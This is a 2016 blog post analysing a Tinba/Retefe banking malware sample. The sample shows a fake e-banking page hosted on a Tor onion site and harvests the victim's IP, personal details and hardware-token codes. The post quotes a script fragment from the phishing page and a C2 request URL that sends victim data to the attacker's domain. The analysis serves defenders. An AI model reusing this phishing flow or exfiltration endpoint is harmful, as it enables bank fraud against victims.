Monday, February 1, 2016

Usage of Tor by Tinba malware

It is not new that cyber criminals and malware developers use Tor. Today I ended up with a very nice sample of the Tinba / Retefe family which has evolved to make usage of Tor.
The sample, which has been already in VT for some days (d770040d2bf4c12c9dc8fd1bfc23bc9b)looks like a valid application to access the e-banking named 'Verifikation.exe'.



So far all the malware related to Retefe / Timba I wrote about tried to steal the bank credentials of the victim while infecting the Windows system. Later on, and in order to steal the two factor authentication token, it fooled the user to install a malicious Android application which permits to forward all the incoming SMS to the 'bad guys'. However, there are some banks which do not use SMS tokens as 2FA, but a RSA token or calculator which generates tokes



Going back to the the 'Verifikation.exe' application, and when launching it, the first thing that happens is that a window simulating the e-banking show ups.  The bad guys are trying to fool the victim this way.




When looking to the network traffic, the first interesting thing that happens is a DNS query to a strange domain: b3pepirxq7l2aybj.onion.link. After the domain has resolved, there is an HTTP GET request to that domain.


What does that domain mean?. The onion.link is an existing domain which is used to link Tor domains to web. For more information about this: http://www.onion.link/faq.html
This means that the website is in Darkweb behind the URL http://b3pepirxq7l2aybj.onion
Actually, if I try to access directly that website from a Tor browser I directly can access the fake website of the bank:


This is very interesting stuff.

Looking at the HTTP request/response and the HTML code there is something interesting:


 ...
\t</div> \n
     [truncated]\t<script>var codehelper_ip={};function getip(v){if(typeof(v)!='undefined') codehelper_ip.IP=v.ip;}</script><script src="https://api.ipify.org/?format=jsonp&callback=getip"></script><script>document.write("<script src='/ajax/st
    \t</body>\n
....


This https://www.ipify.org/ service is used to gather the source IP of the user, in this case the victim. Moreover, there are several HTTP requests which sends the IP of the victim together with other data.



(http://b3pepirxq7l2aybj.onion.link/ajax/status.php?cmdid=8&gettype=t&id=149&ip=x.x.x.x)

This same "ajax/status.php" resource is used to send some data through POST, base64 encoded, which can be easily decoded.






As mentioned in the beginning, there are some banks which do not use SMS as 2FA and this bank is one of them. It is necessary a physical calculator to generate the token, and the malware must be able to also capture this token.

Previously to ask for the token generated, the fake bank page asks for some personal details, like for example the date of birth.




Last step is to ask for the token generated by the calculator, which gives access to the account of the victim.